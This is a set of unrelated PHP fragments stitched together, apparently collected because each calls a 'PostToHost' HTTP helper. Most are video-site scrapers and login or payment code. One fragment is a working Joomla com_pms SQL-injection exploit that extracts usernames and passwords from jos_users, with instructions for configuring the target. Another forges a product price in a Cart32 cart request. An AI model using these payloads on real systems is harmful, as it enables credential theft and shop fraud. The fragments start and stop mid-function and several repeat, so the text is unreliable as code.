fputs($fp, "Accept: */*\r\n"); fputs($fp, "X-Requested-With: XMLHttpRequest\r\n"); fputs($fp, "x-addr: 127.0.0.1\r\n"); fputs($fp, "User-Agent: User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.168 Safari/535.19\r\n"); fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n"); fputs($fp, "Content-length: " . strlen($data_to_send) . "\r\n"); fputs($fp, "Connection: close\r\n\r\n"); fputs($fp, $data_to_send); while (!feof($fp)) { $res .= fgets($fp, 128); } fclose($fp); return $res; } // zaslání požadavku serveru a získání odpovědi $playlist = PostToHost("www.ceskatelevize.cz", "/ivysilani/ajax/playlistURL.php", "http://www.ceskatelevize.cz/ivysilani", $postdata_str) . "</end>"; // získání výsledného URL playlistu - done... $t1 = explode('http://', $playlist); $t2 = explode('<', $t1[1]); $playlistURL = "http://" . $t2[0]; if (($html = openpage($playlistURL)) != FALSE) { $t1 = explode('base="', $html); $t2 = explode('"', $t1[1]); //$r = "'".$t2[0]."'"; $r = $t2[0] . "/"; $videos = explode('<video ', $html); unset($videos[0]); $videos = array_values($videos); foreach ($videos as $video) { $t1 = explode('src="', $video); $t2 = explode('"', $t1[1]);
function post_getstring($data) { $x = PostToHost(OCP_SERVICE_HOST, "/JSON", $data); if ($x == NULL) { return '{"error": "post to host failed, python service down?", "id": 0, "result": []}'; } list($header, $body) = split("\r\n\r\n", $x); return $body; }
fputs($fp, "Accept: */*\r\n"); fputs($fp, "X-Requested-With: XMLHttpRequest\r\n"); fputs($fp, "x-addr: 127.0.0.1\r\n"); fputs($fp, "User-Agent: User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.168 Safari/535.19\r\n"); fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n"); fputs($fp, "Content-length: " . strlen($data_to_send) . "\r\n"); fputs($fp, "Connection: close\r\n\r\n"); fputs($fp, $data_to_send); while (!feof($fp)) { $res .= fgets($fp, 128); } fclose($fp); return $res; } // zaslání požadavku serveru a získání odpovědi $playlist = PostToHost("www.ceskatelevize.cz", "/ivysilani/ajax/get-playlist-url", $URL, $postdata_str); /*$headers = get_headers(PostToHost( "www.ceskatelevize.cz", "/ivysilani/ajax/playlistURL.php", $URL, $postdata_str )); print_r($headers);*/ // získání výsledného URL playlistu - done... $t1 = explode('http://', $playlist); $t2 = explode('<', $t1[1]); $playlistURL = "http://" . $t2[0]; // $html = file_get_contents($link); if (($html = openpage($playlistURL)) != FALSE) { $videos = explode('<switchItem', $html);
if ($method == "POST") { fputs($fp, "{$data}\n"); } $results = ""; while (!feof($fp)) { $results .= fgets($fp, 1024); } fclose($fp); return $results; } // Whee, now all we need to do is set up the data $host = 'www.cart32.com'; $port = 80; $method = "POST"; $path = '/cgi-bin/cart32.exe/justsocks-AddItem'; $refer = 'www.IGuessYouDontTakeYourOwnAdvice..com'; // And even if they did, we could set the Referer to match // anything we wanted. $client = 'CDI Spoof (v1.0)'; $cookie = ""; // Real price of this product was $6.99 $data = 'Price=1000.56&Item=Wigwam+Triathlete+Ultra-Lite&PartNo=F6092&Qty=5&p1=XL&t1=d-Size%3BS%3BM%3BL%3BXL&p2=Black&t2=d-Color%3BBlack%3BWhite'; // And now call the function $raw = PostToHost($host, $port, $method, $path, $data, $refer, $client, $cookie); print "<PRE>\n\n"; print " Host: {$host}\n Port: [{$port}]\n Method: [{$method}]\n Path: [{$path}]\n"; print " Referer: [{$refer}]\n Client: [{$client}]\n Cookie: [{$cookie}]\n"; print " Data: [{$data}]\n"; print "</PRE>\n"; print "<P>Results of operation:<BR><HR NOSHADE><P>\n"; print "{$raw}\n";
$v = str_replace('?', '%3F', $v); } $parms .= '&' . $k . '=' . $v; } } if (strtoupper(substr($url['path'], -4)) != '.HTM') { $parms = substr($parms, 1); } $webgrab_action = 'POST'; $path = $url['path']; if (isset($url['query']) and strlen($url['query']) > 1) { $path = $path . $url['query']; } unset($content); unset($http_header); $content = PostToHost($url['protocol'] . '://' . $url['host'], $path, $referer, $parms); $all_headers = explode("\r\n", $http_header); foreach ($all_headers as $this_header) { if (stristr($this_header, 'Content-Length')) { //echo("Content-Length: ".strlen(trim($content))."\r\n"); header("Content-Length: " . strlen(trim($content)) . "\r\n"); } elseif (stristr($this_header, 'Location')) { //echo $this_header."\r\n"; header($this_header . "\r\n"); } elseif (stristr($this_header, 'Set-Cookie')) { //echo $this_header."\r\n"; header($this_header . "\r\n", false); } elseif (stristr($this_header, 'HTTP')) { //echo $this_header."\r\n"; header($this_header . "\r\n"); }
---------------------------------------------------- */ $host = "localhost"; //your target Joomla Site $cookie = "290cd01070fed63ac53f84f5c91d2bd9=a5846a8c64962e14367d5c7298f6c72c"; //replace this with your own cookie values $useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13\r\n"; //NOTICE: Pay attention on your User-Agent in the POST Header, it have to be the same as you have logged in, //because the cookie-name is dependent on your browser. //Don't change anything below $path = "/joomla/index.php?option=com_pms&Itemid=&page=ignore"; //dont change this $data_to_send = "no_entry=keine+Eintr%E4ge&save=Ignorliste+speichern&filter_site_users=alle&ignore_ids=|63, 111 ) AND 1=2 UNION SELECT 1,concat(username,char(0x3a), password),3 from jos_users -- /* |"; //you don't have to change this print_r($post = PostToHost($host, $path, $cookie, $data_to_send, $useragent)); function PostToHost($host, $path, $cookie, $data_to_send, $useragent) { $fp = fsockopen($host, 80); fputs($fp, "POST {$path} HTTP/1.1\r\n"); fputs($fp, "Host: {$host}\r\n"); fputs($fp, "User-Agent: {$useragent}"); fputs($fp, "Cookie: {$cookie}\r\n"); fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n"); fputs($fp, "Content-length: " . strlen($data_to_send) . "\r\n"); fputs($fp, "Connection: close\r\n\r\n"); fputs($fp, $data_to_send); while (!feof($fp)) { $res .= fgets($fp, 128); } fclose($fp);
fputs($fp, "Accept: */*\r\n"); fputs($fp, "X-Requested-With: XMLHttpRequest\r\n"); fputs($fp, "x-addr: 127.0.0.1\r\n"); fputs($fp, "User-Agent: User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.168 Safari/535.19\r\n"); fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n"); fputs($fp, "Content-length: " . strlen($data_to_send) . "\r\n"); fputs($fp, "Connection: close\r\n\r\n"); fputs($fp, $data_to_send); while (!feof($fp)) { $res .= fgets($fp, 128); } fclose($fp); return $res; } // zaslání požadavku serveru a získání odpovědi $playlist = PostToHost("www.ceskatelevize.cz", "/ivysilani/ajax/playlistURL.php", $URL, $postdata_str); /*$headers = get_headers(PostToHost( "www.ceskatelevize.cz", "/ivysilani/ajax/playlistURL.php", $URL, $postdata_str )); print_r($headers);*/ // získání výsledného URL playlistu - done... $t1 = explode('http://', $playlist); $t2 = explode('<', $t1[1]); $playlistURL = "http://" . $t2[0]; // $html = file_get_contents($link); if (($html = openpage($playlistURL)) != FALSE) { $videos = explode('<switchItem', $html);
include_once DIR_FS_INC . "ajax_error.inc.php"; ajax_error(sprintf(PAYMENT_PROBLEM, ${$_SESSION}['payment']->title)); } } include_once 'includes/application_top.php'; include DIR_FS_INC . 'olc_t_and_c_accepted.inc.php'; // load selected payment module require_once DIR_WS_CLASSES . 'payment.php'; if (isset($_SESSION['credit_covers'])) { $_SESSION['payment'] = EMPTY_STRING; //ICW added for CREDIT CLASS } $payment_modules = new payment(${$_SESSION}['payment']); // load the before_process function from the payment modules $payment_modules->before_process(); //Collect all POST data $post_data = EMPTY_STRING; while (list($key, $value) = each($_POST)) { if ($key == 'target_url') { $target_url = $value; } elseif ($key == 'response_wait') { $response_wait = $value; } else { if (strlen($post_data) > 0) { $post_data .= HTML_AMP; } $post_data .= $key . EQUAL . $value; } } $x = PostToHost($target_url, $post_data, $response_wait);
fputs($fp, "Referer: {$referer}\r\n"); fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n"); fputs($fp, "Content-length: " . strlen($data_to_send) . "\r\n"); fputs($fp, "Connection: close\r\n\r\n"); fputs($fp, $data_to_send); while (!feof($fp)) { $res .= fgets($fp, 128); } fclose($fp); return $res; } // zaslání požadavku serveru a získání odpovědi playlist $postdata = "method=json&action=relevant"; // výpis první stránky //$postdata = "method=json&action=relevant&page=1"; // výpis dalších stránek $playlist = PostToHost("www.iprima.cz", "/videoarchiv_ajax/all/2317/all", "http://www.iprima.cz/videoarchiv_ajax/all/2317/all", $postdata); // překlad do UTF8 $playlist = preg_replace_callback('/\\\\u([0-9a-f]{4})/i', 'replace_unicode_escape_sequence', $playlist); echo $playlist; // získání embed videa /*$postdata = "method=json&action=video"; // výpis embed videa $embed = PostToHost( "www.iprima.cz", "/videoarchiv_ajax/165786", "http://www.iprima.cz/videoarchiv_ajax/171814", $postdata ); // překlad do UTF8 $embed = preg_replace_callback('/\\\\u([0-9a-f]{4})/i', 'replace_unicode_escape_sequence', $embed);
fputs($fp, "Referer: {$referer}\r\n"); fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n"); fputs($fp, "Content-length: " . strlen($data_to_send) . "\r\n"); fputs($fp, "Connection: close\r\n\r\n"); fputs($fp, $data_to_send); while (!feof($fp)) { $res .= fgets($fp, 128); } fclose($fp); return $res; } // zaslání požadavku serveru a získání odpovědi playlist $postdata = "method=json&action=relevant"; // výpis první stránky //$postdata = "method=json&action=relevant&page=1"; // výpis dalších stránek $playlist = PostToHost("play.iprima.cz", "/videoarchiv_ajax/all/{$id}?method=json&action=relevant&per_page=12&channel={$channel}&page={$page}", "http://play.iprima.cz/videoarchiv_ajax/all/{$id}?method=json&action=relevant&per_page=12&channel=" . $channel . "&page=" . $page, $postdata); //?method=json&action=relevant&per_page=12&channel=1&page=0 // překlad do UTF8 $playlist = preg_replace_callback('/\\\\u([0-9a-f]{4})/i', 'replace_unicode_escape_sequence', $playlist); //echo $playlist; //http://www.iprima.cz/videoarchiv/168305/$id/all $videos = explode('{"nid', $playlist); unset($videos[0]); $videos = array_values($videos); foreach ($videos as $video) { $t1 = explode('":"', $video); $t2 = explode('"', $t1[1]); $id_dil = $t2[0]; $t1 = explode('"image":"', $video); $t2 = explode('"', $t1[1]); $nahled = "http://www.iprima.cz/" . str_replace("\\/", "/", $t2[0]);
//print_r ($_SERVER); //include ("functions/ocsp.php"); include "functions/api.php"; include "functions/acceptLogin.php"; if ($_SERVER['HTTP_HOST'] == $_SESSION['_config']['securehostname'] && ($_SESSION['profile']['id'] == 0 || $_SESSION['profile']['loggedin'] == 0)) { if ($_SERVER['SSL_CLIENT_VERIFY'] == 'SUCCESS') { if ($_SERVER['SSL_CLIENT_I_DN_CN'] == 'CA Cert Signing Authority') { $root = 1; } else { if ($_SERVER['SSL_CLIENT_I_DN_CN'] == 'CAcert Class 3 Root') { $root = 2; } } $data = "serial=" . $_SERVER['SSL_CLIENT_M_SERIAL'] . "&root={$root}"; $x = PostToHost("www.cacert.org", "/api/edu.php", "No_Referrer", $data); // 2007-10-22 Ted: Looks like the server has changed the number of header lines in its reply. // IMHO hardcoding the number of header lines in a HTTP response is ... adventurous ... // Look for the first empty line, the data line is the next! Put it in a function! $user_id = $x[10]; if ($user_id != 0) { $sql = "SELECT * FROM user where `user_id`='" . mysql_real_escape_string($user_id) . "'"; $query = mysql_query($sql); $nr = mysql_num_rows($query); if ($nr == 0) { $_SESSION['profile']['id'] = $user_id; acceptLogin(); } else { $row = mysql_fetch_assoc($query); $_SESSION['profile']['loggedin'] = 1; $_SESSION['profile']['language'] = $row['lang'];